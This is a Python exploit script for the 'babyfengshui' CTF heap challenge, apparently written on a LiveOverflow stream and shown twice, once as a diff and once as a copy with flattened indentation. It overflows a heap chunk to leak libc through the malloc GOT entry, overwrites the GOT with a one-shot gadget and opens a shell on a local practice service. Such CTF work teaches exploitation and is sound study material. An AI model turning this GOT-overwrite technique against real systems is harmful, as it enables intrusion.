LiveOverflow · January 29, 2017 15:14
diff --git a/babyfengshui.py b/babyfengshui.py
 import socket
 import telnetlib
 import struct

 """
 developed on stream: https://www.youtube.com/watch?v=zWgS6fTw4Ts
 """

 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect(('127.0.0.1', 2323))
 s.settimeout(0.1)

 def recv_all():
 	out = ''
 	while True:
 		try:
 			out += s.recv(1)
 		except socket.timeout:
 			return out

 print recv_all()

 print "USER 1 created"
 s.send("0\n")
 s.send("16\n")
 s.send("AAAA\n")
 s.send("8\n")
 s.send("AAAA\n")

 print "USER 2 created"
 s.send("0\n")
 s.send("16\n")
 s.send("BBBB\n")
 s.send("8\n")
 s.send("BBBB\n")

 print "USER 1 delted"
 s.send("1\n")
 s.send("0\n")

 print "USER 3 created"
 s.send("0\n")
 s.send("32\n")
 s.send("CCCC\n")
 s.send("8\n")
 s.send("CCCC\n")

 print "USER 3 edited"
 s.send("3\n")
 s.send("2\n")
 s.send("180\n")

 MALLOC_GOT = 0x804b020
 MALLOC_OFFSET = 0x76830
 s.send("D"*160+struct.pack("I", MALLOC_GOT)+"\n")

 print "USER 2 display"
 s.send("2\n")
 recv_all()
 s.send("1\n")
 leak = recv_all()
 MALLOC_LIBC = struct.unpack("I", leak[20:24])[0]

 print "leaked malloc(): 0x{:08x}".format(MALLOC_LIBC)
 LIBC_BASE = MALLOC_LIBC - MALLOC_OFFSET
 print "calculated libc base: 0x{:08x}".format(LIBC_BASE)



 print "USER 3 edited"
 s.send("3\n")
 s.send("2\n")
 s.send("180\n")

 MALLOC_GOT = 0x804b020
 MALLOC_OFFSET = 0x65683
 s.send("D"*160+struct.pack("I", MALLOC_GOT+4)+"\n")

 raw_input()
 print "USER 2 edited"
 s.send("3\n")
 s.send("1\n")
 s.send("4\n")
 ONESHOT = LIBC_BASE + 0x0401B3

 s.send(struct.pack("I", ONESHOT)+"\n")

 t = telnetlib.Telnet()
 t.sock = s
 t.interact()

 """
 0: new user malloc(our_size)
 -> text:

 malloc(0x80)
 -> name:


 [chunk size we control]

 [chunk2 size we control]
 [0x80 user2 chunk | chunk2 we control]

 [0x80 user chunk | chunk we control]





 [chunk3..
 ...]
 [chunk2]
 [user2]
 [user3]

 """
	import socket
	import telnetlib
	import struct

	"""
	developed on stream: https://www.youtube.com/watch?v=zWgS6fTw4Ts
	"""

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(('127.0.0.1', 2323))
	s.settimeout(0.1)

	def recv_all():
	out = ''
	while True:
	try:
	out += s.recv(1)
	except socket.timeout:
	return out

	print recv_all()

	print "USER 1 created"
	s.send("0\n")
	s.send("16\n")
	s.send("AAAA\n")
	s.send("8\n")
	s.send("AAAA\n")

	print "USER 2 created"
	s.send("0\n")
	s.send("16\n")
	s.send("BBBB\n")
	s.send("8\n")
	s.send("BBBB\n")

	print "USER 1 delted"
	s.send("1\n")
	s.send("0\n")

	print "USER 3 created"
	s.send("0\n")
	s.send("32\n")
	s.send("CCCC\n")
	s.send("8\n")
	s.send("CCCC\n")

	print "USER 3 edited"
	s.send("3\n")
	s.send("2\n")
	s.send("180\n")

	MALLOC_GOT = 0x804b020
	MALLOC_OFFSET = 0x76830
	s.send("D"*160+struct.pack("I", MALLOC_GOT)+"\n")

	print "USER 2 display"
	s.send("2\n")
	recv_all()
	s.send("1\n")
	leak = recv_all()
	MALLOC_LIBC = struct.unpack("I", leak[20:24])[0]

	print "leaked malloc(): 0x{:08x}".format(MALLOC_LIBC)
	LIBC_BASE = MALLOC_LIBC - MALLOC_OFFSET
	print "calculated libc base: 0x{:08x}".format(LIBC_BASE)



	print "USER 3 edited"
	s.send("3\n")
	s.send("2\n")
	s.send("180\n")

	MALLOC_GOT = 0x804b020
	MALLOC_OFFSET = 0x65683
	s.send("D"*160+struct.pack("I", MALLOC_GOT+4)+"\n")

	raw_input()
	print "USER 2 edited"
	s.send("3\n")
	s.send("1\n")
	s.send("4\n")
	ONESHOT = LIBC_BASE + 0x0401B3

	s.send(struct.pack("I", ONESHOT)+"\n")

	t = telnetlib.Telnet()
	t.sock = s
	t.interact()

	"""
	0: new user malloc(our_size)
	-> text:

	malloc(0x80)
	-> name:


	[chunk size we control]

	[chunk2 size we control]
	[0x80 user2 chunk \| chunk2 we control]

	[0x80 user chunk \| chunk we control]





	[chunk3..
	...]
	[chunk2]
	[user2]
	[user3]

	"""